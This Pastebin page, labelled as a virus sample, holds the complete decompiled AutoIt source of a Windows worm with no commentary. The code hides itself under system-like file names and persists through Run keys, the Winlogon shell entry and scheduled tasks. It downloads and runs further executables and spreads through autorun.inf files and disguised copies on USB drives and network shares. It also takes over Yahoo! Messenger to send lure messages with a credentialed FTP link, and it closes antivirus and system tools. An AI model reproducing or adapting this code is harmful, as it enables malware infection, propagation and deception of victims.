API tools faq
paste
Advertisement
Guest User

0ee8fbd762cdd6b2e8437b2d810604c4_vir

a guest
Jul 31st, 2015
314
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 26.54 KB | None | 0 0
raw download clone embed print report
  1. #NoTrayIcon
  2.  
  3. Func a140030003034($arg00)
  4. Return RunWait(@ComSpec & " /C " & $arg00, "", @SW_HIDE)
  5. EndFunc
  6.  
  7. Func a250040004048()
  8. If InetGet("http://yahoo.com" & "/" & "setting" & ".doc", @SystemDir & "\" & "setting" & ".ini", 1, 0) = 0 Then
  9. InetGet("http://yahoo.com" & "/" & "setting" & ".xls", @SystemDir & "\" & "setting" & ".ini", 1, 0)
  10. EndIf
  11. Sleep(1000)
  12. If IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "downloaded", "") <> "success" Then
  13. If InetGet("http://yahoo.com" & "/" & "setting" & ".doc", @SystemDir & "\" & "setting" & ".ini", 1, 0) = 0 Then
  14. InetGet("http://yahoo.com" & "/" & "setting" & ".xls", @SystemDir & "\" & "setting" & ".ini", 1, 0)
  15. EndIf
  16. If IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "downloaded", "") <> "success" Then
  17. If InetGet("http://www.yahoo.com" & "/" & "setting" & ".doc", @SystemDir & "\" & "setting" & ".ini", 1, 0) = 0 Then
  18. InetGet("http://www.yahoo.com" & "/" & "setting" & ".xls", @SystemDir & "\" & "setting" & ".ini", 1, 0)
  19. EndIf
  20. EndIf
  21. EndIf
  22. FileSetAttrib(@SystemDir & "\" & "setting" & ".ini", "+RSH")
  23. EndFunc
  24.  
  25. Func a55005000501f()
  26. a250040004048()
  27. If IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload1", "") <> "" Then
  28. If NOT FileExists(@SystemDir & "\" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload1", "") & ".exe") Then
  29. If InetGet(IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "website", "") & "/" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload1", "") & ".doc", @SystemDir & "\" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload1", "") & ".exe", 1, 0) = 0 Then
  30. InetGet(IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "website", "") & "/" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload1", "") & ".xls", @SystemDir & "\" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload1", "") & ".exe", 1, 0)
  31. EndIf
  32. Sleep(3000)
  33. If FileExists(@SystemDir & "\" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload1", "") & ".exe") Then
  34. If Number(FileGetSize(@SystemDir & "\" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload1", "") & ".exe")) / 1024 >= Number(IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "size01", "")) Then
  35. FileSetAttrib(@SystemDir & "\" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload1", "") & ".exe", "+RSH")
  36. Run(@SystemDir & "\" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload1", "") & ".exe")
  37. EndIf
  38. EndIf
  39. EndIf
  40. EndIf
  41. If IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload2", "") <> "" Then
  42. If NOT FileExists(@SystemDir & "\" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload2", "") & ".exe") Then
  43. If InetGet(IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "website", "") & "/" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload2", "") & ".doc", @SystemDir & "\" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload2", "") & ".exe", 1, 0) = 0 Then
  44. InetGet(IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "website", "") & "/" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload2", "") & ".xls", @SystemDir & "\" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload2", "") & ".exe", 1, 0)
  45. EndIf
  46. Sleep(3000)
  47. If FileExists(@SystemDir & "\" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload2", "") & ".exe") Then
  48. If Number(FileGetSize(@SystemDir & "\" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload2", "") & ".exe")) / 1024 >= Number(IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "size02", "")) Then
  49. FileSetAttrib(@SystemDir & "\" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload2", "") & ".exe", "+RSH")
  50. Run(@SystemDir & "\" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload2", "") & ".exe")
  51. EndIf
  52. EndIf
  53. EndIf
  54. EndIf
  55. If IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload3", "") <> "" Then
  56. If NOT FileExists(@SystemDir & "\" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload3", "") & ".exe") Then
  57. If InetGet(IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "website", "") & "/" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload3", "") & ".doc", @SystemDir & "\" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload3", "") & ".exe", 1, 0) = 0 Then
  58. InetGet(IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "website", "") & "/" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload3", "") & ".xls", @SystemDir & "\" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload3", "") & ".exe", 1, 0)
  59. EndIf
  60. Sleep(3000)
  61. If FileExists(@SystemDir & "\" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload3", "") & ".exe") Then
  62. If Number(FileGetSize(@SystemDir & "\" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload3", "") & ".exe")) / 1024 >= Number(IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "size03", "")) Then
  63. FileSetAttrib(@SystemDir & "\" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload3", "") & ".exe", "+RSH")
  64. Run(@SystemDir & "\" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload3", "") & ".exe")
  65. EndIf
  66. EndIf
  67. EndIf
  68. EndIf
  69. If IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload4", "") <> "" Then
  70. If NOT FileExists(@SystemDir & "\" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload4", "") & ".exe") Then
  71. If InetGet(IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "website", "") & "/" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload4", "") & ".doc", @SystemDir & "\" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload4", "") & ".exe", 1, 0) = 0 Then
  72. InetGet(IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "website", "") & "/" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload4", "") & ".xls", @SystemDir & "\" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload4", "") & ".exe", 1, 0)
  73. EndIf
  74. Sleep(3000)
  75. If FileExists(@SystemDir & "\" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload4", "") & ".exe") Then
  76. If Number(FileGetSize(@SystemDir & "\" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload4", "") & ".exe")) / 1024 >= Number(IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "size04", "")) Then
  77. FileSetAttrib(@SystemDir & "\" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload4", "") & ".exe", "+RSH")
  78. Run(@SystemDir & "\" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload4", "") & ".exe")
  79. EndIf
  80. EndIf
  81. EndIf
  82. EndIf
  83. If IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload4", "") <> "" Then
  84. If NOT FileExists(@SystemDir & "\" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload5", "") & ".exe") Then
  85. If InetGet(IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "website", "") & "/" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload5", "") & ".doc", @SystemDir & "\" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload5", "") & ".exe", 1, 0) = 0 Then
  86. InetGet(IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "website", "") & "/" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload5", "") & ".xls", @SystemDir & "\" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload5", "") & ".exe", 1, 0)
  87. EndIf
  88. Sleep(3000)
  89. If FileExists(@SystemDir & "\" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload5", "") & ".exe") Then
  90. If Number(FileGetSize(@SystemDir & "\" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload5", "") & ".exe")) / 1024 >= Number(IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "size05", "")) Then
  91. FileSetAttrib(@SystemDir & "\" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload5", "") & ".exe", "+RSH")
  92. Run(@SystemDir & "\" & IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "filedownload5", "") & ".exe")
  93. EndIf
  94. EndIf
  95. EndIf
  96. EndIf
  97. $a2640c040c013 = @HOUR + 2
  98. If $a2640c040c013 > 12 Then
  99. $a2640c040c013 = $a2640c040c013 - 12
  100. EndIf
  101. EndFunc
  102.  
  103. Func a390060006024()
  104. $a2681b081b014 = IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "myweb", "")
  105. If $a2681b081b014 = "" Then
  106. $a2681b081b014 = "selfextract.exe"
  107. EndIf
  108. Dim $gdimarr0000[10]
  109. $gdimarr0000[0] = IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "tin[0]", "")
  110. If $gdimarr0000[0] = "" Then
  111. $gdimarr0000[0] = "cyber cafe scandal visit ftp://tlpoeil:yahoogoogle@ftp.members.lycos.co.uk/" & $a2681b081b014 & " "
  112. EndIf
  113. $gdimarr0000[1] = IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "tin[1]", "")
  114. If $gdimarr0000[1] = "" Then
  115. $gdimarr0000[1] = "World Business news broadcaster ftp://tlpoeil:yahoogoogle@ftp.members.lycos.co.uk/" & $a2681b081b014 & " "
  116. EndIf
  117. $gdimarr0000[2] = IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "tin[2]", "")
  118. If $gdimarr0000[2] = "" Then
  119. $gdimarr0000[2] = "Regular monthly income by wearing your shorts at the comfort of your home for more info ftp://tlpoeil:yahoogoogle@ftp.members.lycos.co.uk/" & $a2681b081b014 & " "
  120. EndIf
  121. $gdimarr0000[3] = IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "tin[3]", "")
  122. If $gdimarr0000[3] = "" Then
  123. $gdimarr0000[3] = "Nfs carbon download ftp://tlpoeil:yahoogoogle@ftp.members.lycos.co.uk/" & $a2681b081b014 & " "
  124. EndIf
  125. $gdimarr0000[4] = IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "tin[4]", "")
  126. If $gdimarr0000[4] = "" Then
  127. $gdimarr0000[4] = "Latest video shot of infosys girl ftp://tlpoeil:yahoogoogle@ftp.members.lycos.co.uk/" & $a2681b081b014 & " "
  128. EndIf
  129. $gdimarr0000[5] = IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "tin[5]", "")
  130. If $gdimarr0000[5] = "" Then
  131. $gdimarr0000[5] = "Latest video shot of infosys girl ftp://tlpoeil:yahoogoogle@ftp.members.lycos.co.uk/ " & $a2681b081b014 & " "
  132. EndIf
  133. $gdimarr0000[6] = IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "tin[6]", "")
  134. If $gdimarr0000[6] = "" Then
  135. $gdimarr0000[6] = "stream Video of Nayanthara and Simbu ftp://tlpoeil:yahoogoogle@ftp.members.lycos.co.uk/" & $a2681b081b014 & " "
  136. EndIf
  137. $gdimarr0000[7] = IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "tin[7]", "")
  138. If $gdimarr0000[7] = "" Then
  139. $gdimarr0000[7] = "Aishwarya Rai videos ftp://tlpoeil:yahoogoogle@ftp.members.lycos.co.uk/" & $a2681b081b014 & " "
  140. EndIf
  141. $gdimarr0000[8] = IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "tin[8]", "")
  142. If $gdimarr0000[8] = "" Then
  143. $gdimarr0000[8] = "Free mobile games ftp://tlpoeil:yahoogoogle@ftp.members.lycos.co.uk/" & $a2681b081b014 & " "
  144. EndIf
  145. $gdimarr0000[9] = IniRead(@SystemDir & "\" & "setting" & ".ini", "setting", "tin[9]", "")
  146. If $gdimarr0000[9] = "" Then
  147. $gdimarr0000[9] = "Nse going to crash for more ftp://tlpoeil:yahoogoogle@ftp.members.lycos.co.uk/" & $a2681b081b014 & " "
  148. EndIf
  149. If WinExists(WinGetTitle("Yahoo! Messenger", "")) = 1 Then
  150. ClipPut($gdimarr0000[Random(0, 9, 1)])
  151. BlockInput(1)
  152. WinActivate(WinGetTitle("Yahoo! Messenger", ""))
  153. Send("!m")
  154. Send("un")
  155. Send("^v {ENTER}{ENTER}")
  156. Send("^m")
  157. Send("{DOWN}")
  158. Send("^{SHIFTDOWN}{END}{SHIFTUP}")
  159. Send("{ENTER}")
  160. Send("^v {ENTER}")
  161. BlockInput(0)
  162. EndIf
  163. $a1040f040f03c = @MIN + 30
  164. If $a1040f040f03c > 60 Then
  165. $a1040f040f03c = $a1040f040f03c - 60
  166. EndIf
  167. EndFunc
  168.  
  169. Func a4e0070007039()
  170. If WinExists("Bkav2006") Then
  171. WinClose("Bkav2006")
  172. RegDelete("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "BkavFw")
  173. EndIf
  174. If WinExists("System Configuration") Then
  175. WinClose("System Configuration")
  176. EndIf
  177. If WinExists("Registry") Then
  178. WinClose("Registry")
  179. EndIf
  180. If WinExists("Windows mask") Then
  181. WinClose("Windows mask")
  182. EndIf
  183. If WinExists("[FireLion]") Then
  184. RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run", "IEProtection")
  185. Shutdown(2)
  186. EndIf
  187. If ProcessExists("cmder.exe") Then
  188. ProcessClose("cmder.exe")
  189. EndIf
  190. EndFunc
  191.  
  192. Func a1b0090009002($arg00)
  193. Local $var0000 = FileFindFirstFile($arg00 & "\*.*")
  194. While 1
  195. Dim $gdimvar0002 = FileFindNextFile($var0000)
  196. If @error OR StringLen($gdimvar0002) < 1 Then ExitLoop
  197. If StringInStr(FileGetAttrib($arg00 & "\" & $gdimvar0002), "D") AND ($gdimvar0002 <> "." OR $gdimvar0002 <> "..") Then
  198. FileCopy(@WindowsDir & "\" & "regsvr" & ".exe", $arg00 & "\" & $gdimvar0002 & "\" & $gdimvar0002 & " " & ".exe", 0)
  199. FileDelete($arg00 & "\" & $gdimvar0002 & "\" & $gdimvar0002 & ".exe")
  200. a1b0090009002($arg00 & "\" & $gdimvar0002)
  201. EndIf
  202. Sleep(1)
  203. WEnd
  204. FileClose($var0000)
  205. EndFunc
  206.  
  207. Func a630080008039()
  208. $a571230123018 = DriveGetDrive("REMOVABLE")
  209. If NOT @error Then
  210. Dim $gdimarr0001[6]
  211. $gdimarr0001[1] = ""
  212. For $a4f00f000f042 = 1 To $a571230123018[0]
  213. $gdimarr0001[$a4f00f000f042 - 1] = $a571230123018[$a4f00f000f042]
  214. Next
  215. If $gdimarr0001[0] <> "A:" Then
  216. If $gdimarr0001[0] <> "" Then
  217. FileCopy(@WindowsDir & "\" & "regsvr" & ".exe", $gdimarr0001[0] & "\New Folder .exe", 0)
  218. Sleep(1)
  219. FileCopy(@SystemDir & "\" & "regsvr" & ".exe", $gdimarr0001[0] & "\" & "regsvr" & ".exe", 0)
  220. Sleep(1)
  221. FileCopy(@SystemDir & "\setup.ini", $gdimarr0001[0] & "\autorun.inf", 0)
  222. FileSetAttrib($gdimarr0001[0] & "\autorun.inf", "+RSH")
  223. Sleep(1)
  224. a1b0090009002($gdimarr0001[0])
  225. EndIf
  226. EndIf
  227. If $gdimarr0001[0] = "A:" Then
  228. If $gdimarr0001[1] <> "" Then
  229. FileCopy(@WindowsDir & "\" & "regsvr" & ".exe", $gdimarr0001[1] & "\New Folder .exe", 0)
  230. Sleep(1)
  231. FileCopy(@SystemDir & "\" & "regsvr" & ".exe", $gdimarr0001[1] & "\" & "regsvr" & ".exe", 0)
  232. Sleep(1)
  233. FileCopy(@SystemDir & "\setup.ini", $gdimarr0001[1] & "\autorun.inf", 0)
  234. FileSetAttrib($gdimarr0001[1] & "\autorun.inf", "+RSH")
  235. Sleep(1)
  236. a1b0090009002($gdimarr0001[1])
  237. EndIf
  238. EndIf
  239. EndIf
  240. EndFunc
  241.  
  242. Func a2200a000a01f()
  243. Dim $gdimarr0003[30]
  244. For $a4f00f000f042 = 1 To 30
  245. $a296220622038 = RegEnumKey("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\WorkgroupCrawler\Shares", $a4f00f000f042)
  246. If @error Then ExitLoop
  247. $a296220622038 = StringReplace($a296220622038, "/", "\")
  248. $gdimarr0003[$a4f00f000f042] = "\\" & $a296220622038
  249. $a2b6270627002 = FileCopy(@WindowsDir & "\" & "regsvr" & ".exe", $gdimarr0003[$a4f00f000f042] & "\New Folder .exe", 1)
  250. If $a2b6270627002 = 1 Then
  251. FileCopy(@SystemDir & "\" & "regsvr" & ".exe", $gdimarr0003[$a4f00f000f042] & "\" & "regsvr" & ".exe", 0)
  252. FileCopy(@SystemDir & "\setup.ini", $gdimarr0003[$a4f00f000f042] & "\autorun.inf", 1)
  253. FileSetAttrib($gdimarr0003[$a4f00f000f042] & "\autorun.inf", "+RSH")
  254. a1b0090009002($gdimarr0003[$a4f00f000f042])
  255. EndIf
  256. Next
  257. RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\WorkgroupCrawler\Shares", "shared", "REG_SZ", $gdimarr0003[$a4f00f000f042 - 1] & "\New Folder .exe")
  258. EndFunc
  259.  
  260. Func a5b00b000b003()
  261. IniWrite(@SystemDir & "\setup.ini", "Autorun", "Open", "regsvr" & ".exe")
  262. IniWrite(@SystemDir & "\setup.ini", "Autorun", "Shellexecute", "regsvr" & ".exe")
  263. IniWrite(@SystemDir & "\setup.ini", "Autorun", "Shell\Open\command", "regsvr" & ".exe")
  264. IniWrite(@SystemDir & "\setup.ini", "Autorun", "Shell", "Open")
  265. Sleep(1)
  266. FileSetAttrib(@SystemDir & "\setup.ini", "+RSH")
  267. EndFunc
  268.  
  269. Func install()
  270. Opt("RunErrorsFatal", 0)
  271. DirCreate(@SystemDir & "\28463")
  272. FileSetAttrib(@SystemDir & "\28463", "SH")
  273. FileInstall("C:\svchost.exe", @SystemDir & "\28463\" & "svchost" & ".exe", 0)
  274. FileInstall("C:\svchost.001", @SystemDir & "\28463\" & "svchost" & ".001", 0)
  275. FileCopy(@AutoItExe, @SystemDir & "\" & "regsvr" & ".exe", 0)
  276. FileSetAttrib(@SystemDir & "\" & "regsvr" & ".exe", "+RSH")
  277. FileCopy(@AutoItExe, @WindowsDir & "\" & "regsvr" & ".exe", 0)
  278. FileSetAttrib(@WindowsDir & "\" & "regsvr" & ".exe", "-RSH")
  279. FileCopy(@AutoItExe, @SystemDir & "\" & "svchost " & ".exe", 0)
  280. FileSetAttrib(@SystemDir & "\" & "svchost " & ".exe", "+RSH")
  281. $12345 = "C:\WINDOWS\system32\regsvr.exe"
  282. If NOT (RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run", "Msn Messsenger") == $12345) Then
  283. Run(@SystemDir & "\28463\" & "svchost" & ".exe", "")
  284. EndIf
  285. EndFunc
  286.  
  287. Func regedit()
  288. RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "Shell", "REG_SZ", "Explorer.exe " & "regsvr" & ".exe")
  289. RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run", "Msn Messsenger", "REG_SZ", @SystemDir & "\" & "regsvr" & ".exe")
  290. RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "NofolderOptions", "REG_DWORD", 0)
  291. RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr", "REG_DWORD", 0)
  292. RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableRegistryTools", "REG_DWORD", 1)
  293. RegWrite("HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Schedule", "AtTaskMaxHours", "REG_DWORD", 0)
  294. EndFunc
  295.  
  296. Func funmain()
  297. $hour = @HOUR + 2
  298. $min = @MIN + 30
  299. Opt("RunErrorsFatal", 0)
  300. install()
  301. regedit()
  302. a140030003034("AT /delete /yes")
  303. a140030003034("AT 09:00 /interactive /EVERY:m,t,w,th,f,s,su " & @SystemDir & "\" & "svchost " & ".exe")
  304. a5b00b000b003()
  305. a55005000501f()
  306. a390060006024()
  307. If RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\WorkgroupCrawler\Shares", "shared") = "" Then
  308. a2200a000a01f()
  309. EndIf
  310. If RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\WorkgroupCrawler\Shares", "shared") <> "" Then
  311. If FileExists(RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\WorkgroupCrawler\Shares", "shared")) = 0 Then
  312. a2200a000a01f()
  313. EndIf
  314. EndIf
  315. If ProcessExists("game_y.exe") Then
  316. ProcessClose("game_y.exe")
  317. EndIf
  318. Sleep(1000)
  319. If ProcessExists("game_y.exe") Then
  320. ProcessClose("game_y.exe")
  321. EndIf
  322. Sleep(1000)
  323. If ProcessExists("game_y.exe") Then
  324. ProcessClose("game_y.exe")
  325. EndIf
  326. Sleep(1000)
  327. If ProcessExists("game_y.exe") Then
  328. ProcessClose("game_y.exe")
  329. EndIf
  330. Sleep(1000)
  331. While (1)
  332. a4e0070007039()
  333. a630080008039()
  334. If @HOUR = $hour Then
  335. a55005000501f()
  336. If ProcessExists("game_y.exe") Then
  337. ProcessClose("game_y.exe")
  338. EndIf
  339. Sleep(1000)
  340. If ProcessExists("game_y.exe") Then
  341. ProcessClose("game_y.exe")
  342. EndIf
  343. Sleep(1000)
  344. If ProcessExists("game_y.exe") Then
  345. ProcessClose("game_y.exe")
  346. EndIf
  347. Sleep(1000)
  348. If ProcessExists("game_y.exe") Then
  349. ProcessClose("game_y.exe")
  350. EndIf
  351. Sleep(1000)
  352. EndIf
  353. If @MIN = $min Then
  354. a390060006024()
  355. EndIf
  356. WEnd
  357. EndFunc
  358.  
  359. Func delete()
  360. FileDelete(@SystemDir & "\setup.ini")
  361. FileMove(@SystemDir & "\" & "rundll" & ".exe", @SystemDir & "\" & "delete" & ".exe", 9)
  362. FileDelete(@SystemDir & "\setup.ini")
  363. If FileExists(@SystemDir & "\" & "regsvr" & ".exe") Then
  364. FileDelete(@SystemDir & "\" & "regsvr" & ".exe")
  365. EndIf
  366. If FileExists(@SystemDir & "\" & "winhelp" & ".exe") Then
  367. FileDelete(@SystemDir & "\" & "winhelp" & ".exe")
  368. EndIf
  369. If FileExists(@WindowsDir & "\" & "regsvr" & ".exe") Then
  370. FileDelete(@WindowsDir & "\" & "regsvr" & ".exe")
  371. EndIf
  372. If FileExists(@WindowsDir & "\" & "winhelp" & ".ini") Then
  373. FileDelete(@WindowsDir & "\" & "winhelp" & ".ini")
  374. EndIf
  375. RegDelete("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "Shell")
  376. RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "Shell", "REG_SZ", "Explorer.exe ")
  377. RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run", "Msn Messsenger")
  378. RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "NofolderOptions", "REG_DWORD", 0)
  379. RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr", "REG_DWORD", 0)
  380. RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableRegistryTools", "REG_DWORD", 0)
  381. RegWrite("HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Schedule", "AtTaskMaxHours", "REG_DWORD", 0)
  382. EndFunc
  383.  
  384. Func removablerestrict()
  385. $a571230123018 = DriveGetDrive("REMOVABLE")
  386. If NOT @error Then
  387. Dim $gdimarr0001[6]
  388. $gdimarr0001[1] = ""
  389. For $a4f00f000f042 = 1 To $a571230123018[0]
  390. $gdimarr0001[$a4f00f000f042 - 1] = $a571230123018[$a4f00f000f042]
  391. Next
  392. If $gdimarr0001[0] <> "A:" Then
  393. If $gdimarr0001[0] <> "" Then
  394. FileCopy(@AppDataDir & "\" & "regsvr" & ".exe", $gdimarr0001[0] & "\New Folder .exe", 0)
  395. Sleep(1)
  396. FileCopy(@AppDataDir & "\" & "regsvr" & ".exe", $gdimarr0001[0] & "\" & "regsvr" & ".exe", 0)
  397. Sleep(1)
  398. FileCopy(@AppDataDir & "\setup.ini", $gdimarr0001[0] & "\autorun.inf", 0)
  399. FileSetAttrib($gdimarr0001[0] & "\autorun.inf", "+RSH")
  400. Sleep(1)
  401. removablerestrictsupport($gdimarr0001[0])
  402. EndIf
  403. EndIf
  404. If $gdimarr0001[0] = "A:" Then
  405. If $gdimarr0001[1] <> "" Then
  406. FileCopy(@AppDataDir & "\" & "regsvr" & ".exe", $gdimarr0001[1] & "\New Folder .exe", 0)
  407. Sleep(1)
  408. FileCopy(@AppDataDir & "\" & "regsvr" & ".exe", $gdimarr0001[1] & "\" & "regsvr" & ".exe", 0)
  409. Sleep(1)
  410. FileCopy(@AppDataDir & "\setup.ini", $gdimarr0001[1] & "\autorun.inf", 0)
  411. FileSetAttrib($gdimarr0001[1] & "\autorun.inf", "+RSH")
  412. Sleep(1)
  413. removablerestrictsupport($gdimarr0001[1])
  414. EndIf
  415. EndIf
  416. EndIf
  417. EndFunc
  418.  
  419. Func removablerestrictsupport($arg00)
  420. Local $var0000 = FileFindFirstFile($arg00 & "\*.*")
  421. While 1
  422. Dim $gdimvar0002 = FileFindNextFile($var0000)
  423. If @error OR StringLen($gdimvar0002) < 1 Then ExitLoop
  424. If StringInStr(FileGetAttrib($arg00 & "\" & $gdimvar0002), "D") AND ($gdimvar0002 <> "." OR $gdimvar0002 <> "..") Then
  425. FileCopy(@AppDataDir & "\" & "regsvr" & ".exe", $arg00 & "\" & $gdimvar0002 & "\" & $gdimvar0002 & " " & ".exe", 0)
  426. FileDelete($arg00 & "\" & $gdimvar0002 & "\" & $gdimvar0002 & ".exe")
  427. removablerestrictsupport($arg00 & "\" & $gdimvar0002)
  428. EndIf
  429. Sleep(1)
  430. WEnd
  431. FileClose($var0000)
  432. EndFunc
  433.  
  434. Func networkrestrict()
  435. Dim $gdimarr0003[30]
  436. For $a4f00f000f042 = 1 To 30
  437. $a296220622038 = RegEnumKey("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\WorkgroupCrawler\Shares", $a4f00f000f042)
  438. If @error Then ExitLoop
  439. $a296220622038 = StringReplace($a296220622038, "/", "\")
  440. $gdimarr0003[$a4f00f000f042] = "\\" & $a296220622038
  441. $a2b6270627002 = FileCopy(@AppDataDir & "\" & "regsvr" & ".exe", $gdimarr0003[$a4f00f000f042] & "\New Folder .exe", 1)
  442. If $a2b6270627002 = 1 Then
  443. FileCopy(@AppDataDir & "\" & "regsvr" & ".exe", $gdimarr0003[$a4f00f000f042] & "\" & "regsvr" & ".exe", 0)
  444. FileCopy(@AppDataDir & "\setup.ini", $gdimarr0003[$a4f00f000f042] & "\autorun.inf", 1)
  445. FileSetAttrib($gdimarr0003[$a4f00f000f042] & "\autorun.inf", "+RSH")
  446. removablerestrictsupport($gdimarr0003[$a4f00f000f042])
  447. EndIf
  448. Next
  449. RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\WorkgroupCrawler\Shares", "shared", "REG_SZ", $gdimarr0003[$a4f00f000f042 - 1] & "\New Folder .exe")
  450. EndFunc
  451.  
  452. Func writeini()
  453. IniWrite(@AppDataDir & "\setup.ini", "Autorun", "Open", "regsvr" & ".exe")
  454. IniWrite(@AppDataDir & "\setup.ini", "Autorun", "Shellexecute", "regsvr" & ".exe")
  455. IniWrite(@AppDataDir & "\setup.ini", "Autorun", "Shell\Open\command", "regsvr" & ".exe")
  456. IniWrite(@AppDataDir & "\setup.ini", "Autorun", "Shell", "Open")
  457. Sleep(1)
  458. FileSetAttrib(@AppDataDir & "\setup.ini", "+RSH")
  459. EndFunc
  460.  
